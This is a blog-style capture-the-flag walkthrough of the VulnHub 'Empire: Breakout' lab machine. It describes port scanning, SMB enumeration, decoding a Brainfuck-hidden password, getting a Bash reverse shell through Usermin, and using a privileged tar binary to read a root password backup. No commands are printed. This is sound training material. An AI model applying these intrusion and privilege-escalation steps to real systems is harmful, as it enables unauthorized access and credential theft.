Table of Contents
From my previous article, we have completed the first vulnerable box of the Empire series.
Empire: LupinOne:
Empire: LupinOne - VulnHub Complete Walkthrough
This detailed walkthrough on CyberSec Mastery explores how to complete the LupinOne VM from VulnHub. LupinOne is a beginner-friendly vulnerable machine aimed at testing and improving your penetration testing skills. The walkthrough covers the enumeration, exploitation, and post-exploitation phases, providing step-by-step instructions to gain root access and successfully complete the challenge.
Empire Breakout is a vulnerable machine with a difficulty-level easy machine designed by icex64 and Empire Cybersecurity.
Settings Up
Firstly, we have to download the zip file from VulnHub.
On completion, launch VirtualBox.
Before creating new VMs, we have to extract the downloaded file.
To create a new Virtual Machine click on New.
Fill in the name, type, and version:
Click Next, choose the size of memory, and then browse the .vmdk file from the extracted directory.
On completion, Check if the Network Adapter is set to Host-only adapter, or not.
Once you are done with the settings up, let’s START the instance VMs.
The instance is ready, and we have a terminal screen that prompts us to input the password.
Enumeration
Our First step is to find out the target IP address using NetDiscover.
From the Scanning, we have discovered our
target IP address which is 192.168.56.108.
We have discovered the IP address, so let's perform a network scan to detect what ports are open is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool:
Conducting Network Scans with Nmap
- -p- : select all open ports
- -A : Enable OS detection, version detection, script scanning, and traceroute
- -T : To specify the time.
From the Nmap output, we have spotted five open ports.
- Port 80/TCP running an HTTP service, which indicates that there might be a website running.
- Port 139/TCP and 445/TCP both share the same service NetBios SSN.
- Port 10000/TCP and 20000/TCP are both running HTTP services.
Web Enumeration
Let’s look at the contents ourselves, we
can open a web browser of our choice, and navigate to the target's IP address
in the URL bar at the top of the window.
From the output, we have noticed that the running website is a default page of the Apache 2 HTTP service. Nothing seems to be of interest here, so, let’s take a look at the content of the other two Ports.
The running webpage shows a login form to log in to Webmin. If we have valid credentials, then we can manage to get login access and a foothold on the server.
Foothold
From the Nmap scan, we have spotted two open ports running the NetBIOS-SSN service.
I have a write-up similar to this Port, where I have managed to hack the server.
If you have not read that article, click here:
Exploiting SMB (Samba) - Port 139 and Port 445
This article on CyberSec Mastery delves into the exploitation of SMB (Server Message Block) services running on ports 139 and 445. SMB is a network protocol used for sharing files, printers, and other resources between nodes on a network. The post explores various SMB vulnerabilities and provides insights into how attackers can exploit them to gain unauthorized access, execute arbitrary code, or perform other malicious activities.
Enumerating SMB (Samba) with enum4linux
Let’s enumerate the SMB shares using enum4linux. It is basically a wrapper around the tools in the Samba package and makes it easy to quickly extract information from the target about SMB.
From the output, we identified a Local user
cyber, which might help us in terms of login with the Webmin. Now we have a
username, we only need the password to get the login access.
If you take a look at the page source code of the Apache2 Debian default page, then you will find an encrypted message.
The encrypted ciphertext seems to be in the form of a brain fuck algorithm.
Decryption of Encrypted Brainfuck Cipher Text
Open the browser and search for the brain fuck decoder. Paste here the ciphertext and execute it.
On successful execution, you will spot a password.
Establishing Reverse Shell Access Through Usermin Webmail Interface
Now, we have a valid username and password, so let’s try to log in with the web portal of Port 20000.
Before Login |
After Login |
The login was successful and displayed with the ‘Usermin’ application dashboard.
Run Command Shell from USERMIN Dashboard >> Login >> Command Shell.
Next, run the ls command to list the files and the directory's contents. As a result, we found the user.txt. Open this using the cat command.
Let’s create a Bash reverse shell:
Before running this script, you have turned on the Netcat listener on the port that you mentioned:
On Successful execution, you will be found that reverse shell on Port 4242.
Since this is not the root user, let’s identify further information about the target machine, which could be useful for gaining root access.
Privilege Escalation
Let's identify the rights, and privileges of the current user by executing the sudo -l command:
This error means the sudo command-line utility is not installed.
Directory Traversal and Password Extraction Privilege Escalation
As we have no rights, we cannot install it. Now, we can only way to escalate the Privilege locally.
As our instance running HTTP Servers, there might be some clue, so let’s take a look at the files and directories of the /var directory. Notice, that there is a backups directory listed in this same directory, so take a look at the content of the /backups directory.
As we have no privilege to read the content of the old_pass.bak file.
If you take a look at the files and directories of the current directory previously, you will have noticed a tar file, which has root permission to read, write, and execute.
What is tar?
Tar is a computer software utility for collecting many files into one archive file, often referred to as a tarball, for distribution or backup purposes.
Let's create an archive file called backup.tar file. Click on tar .
On successful execution, you notice a tar archive in the current directory. Extract the archive and take a look at the content within it.
From the output, we have spotted a password. So let’s try to log in to the root user.
Finally, we have the root shell and verify using the “id” command.
It has been proven that it is the root, simply change the directory to the /root path to obtain the root flag.
Congratulation! On completion of both
Capture the Flags.